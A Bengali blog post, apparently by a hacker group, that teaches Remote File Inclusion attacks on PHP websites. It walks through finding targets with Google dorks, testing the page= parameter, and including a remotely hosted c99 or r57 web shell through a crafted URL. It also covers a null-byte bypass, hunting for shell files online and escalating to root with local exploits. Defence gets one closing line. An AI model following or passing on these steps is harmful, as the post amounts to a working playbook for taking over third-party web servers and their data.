!i!i!i রিমোট ফাইল ইনক্লুসন(RFI) ভিডিও টিউটোরিয়াল সহ !i!i!i

6
539

রিমোট ফাইল ইনক্লুসন (RFI) এর মাধ্যমে অন্যকোন ওয়েবসাইটের ফাইল টার্গেটসাইটে Include করা হয়।সাধারণত যে ফাইলটি include করা হয় তাকে বলে Shell যা হ্যাকার কে server side command execute করতে দেয় এবং যেকোন ফাইল access করতে দেয়।
অনেক সার্ভারই RFI vulnerable।কারন PHP এর default settings হিসেবে register_globals ও allow_url_fopen কমান্ড এনাবল করা থাকে।যদিও PHP 6.0 এর register_globals রিমুভ করা হয়েছে।এখন দেখি কিভাবে হ্যাকার ওয়েবসাইট এর vulnerability এক্সপ্লয়েট করে।

01 !i!i!i রিমোট ফাইল ইনক্লুসন(RFI) ভিডিও টিউটোরিয়াল সহ !i!i!i

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

১।হ্যাকার একটি ওয়েবসাইট খুজে বের করবে যা তার পেজ গুলো PHP () function এর মাধ্যমে পেয়ে থাকে আর যা RFI এর জন্য vulnerable।বেশির ভাগ হ্যাকার Google dork ব্যবহার করে RFI এর জন্য vulnerable সাইট বের করতে।

RFI গুগল Dork

২।যে সব Website এর নেভিগেসন সিস্টেমে অন্য জায়গা থেকে পেজ কল করা হয় যেমন
http://target-site.com/index.php?page=PageName

৩।পেজটা vulnerable হলে হ্যাকার ওই PageName এর পরিবর্তে একটি ওয়েবসাইট include করার চেষ্টা করবে।

http://target-site.com/index.php?page=http://google.com

৪।যদি ওয়েবসাইটে Google হোমপেজ দেখায় তাহলে হ্যাকার বুঝবে যে ওয়েবসাইটটি vulnerable এবং shell include করবে ।

৫।জনপ্রিয় দুটি shell হল c99 ও r57।হ্যাকারদের এটা একটা remote server থেকে upload করতে হবে বা Google dork দ্বারা যে ওয়েবসাইটে upload করা আছে তা খুজে বের করতে হবে ও include করতে হবে।shell খুজতে হ্যাকার Google এ inurl:c99.txt লিখে search দিতে পারে ।অনেক ওয়েবসাইটেই c99.txt পাওয়া যাবে। URL এর শেষে ? যোগ করতে হবে।কারন যদি c99.txt এর পর কিছু আসে তাহলে তা shell এ pass করে দেবে।নতুন URL টা shell সহ দেখতে এমন হবে
http://target-site.com/index.php?page=http://shellsite.com/c99.txt?

৬।মাঝেমাঝে server এর PHP script এ .php দেখা যায় প্রত্যেক ফাইল এর পর। তুমি shell include করার পর দেখাবে “c99.txt.php” ফলে এটা কাজ করবে না।এটা দূর করতে তোমাকে একটা null byte (%00) যোগ করতে হবে ।

৭।১ নং এ বলা হয়েছে যে হ্যাকার Google dork দিয়ে RFI vulnerable ওয়েবসাইট বের করবে।ধরি একটা Google dork হলঃ allinurl:.php?page= এটি php?page= সহ URL খুজে।কিন্তু এত সহজে vulnerable site পাওয়া যায় না।হ্যাকাররা সাধারণত 1337day এর মত এক্সপ্লয়েট ডাটাবেসে RFI Vulnerable ওয়েবসাইটের এক্সপ্লয়েট খুঁজে।

৮।যদি হ্যাকার সারভার এর shell, parse করতে পারে তাহলে সে নিচের screen দেখতে পাবে।

shell টি remote সার্ভার এর তথ্য গুলো দেখাবে এবং সব ফাইল ও directory এর list দেখাবে।

৯।এরপর হ্যাকার root privilege পাওয়ার চেষ্টা করবে।লোকাল এক্সপ্লয়েট আপলোড করে ও run করেও সে root privilege পেতে পারে।
এই RFI attacks থেকে বাচতে চাইলে up-to-date scripts ব্যবহার করতে হবে।আর সার্ভারে php.ini এর register_globals disabled করতে হবে।

ভিডিও টিউটোরিয়াল

পোস্ট টি ভালো লাগলে লাইক iT
P1n1X_Cr3w
Bangladesh Cyber Army
TunerPage

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

6 মন্তব্য

মন্তব্য দিন আপনার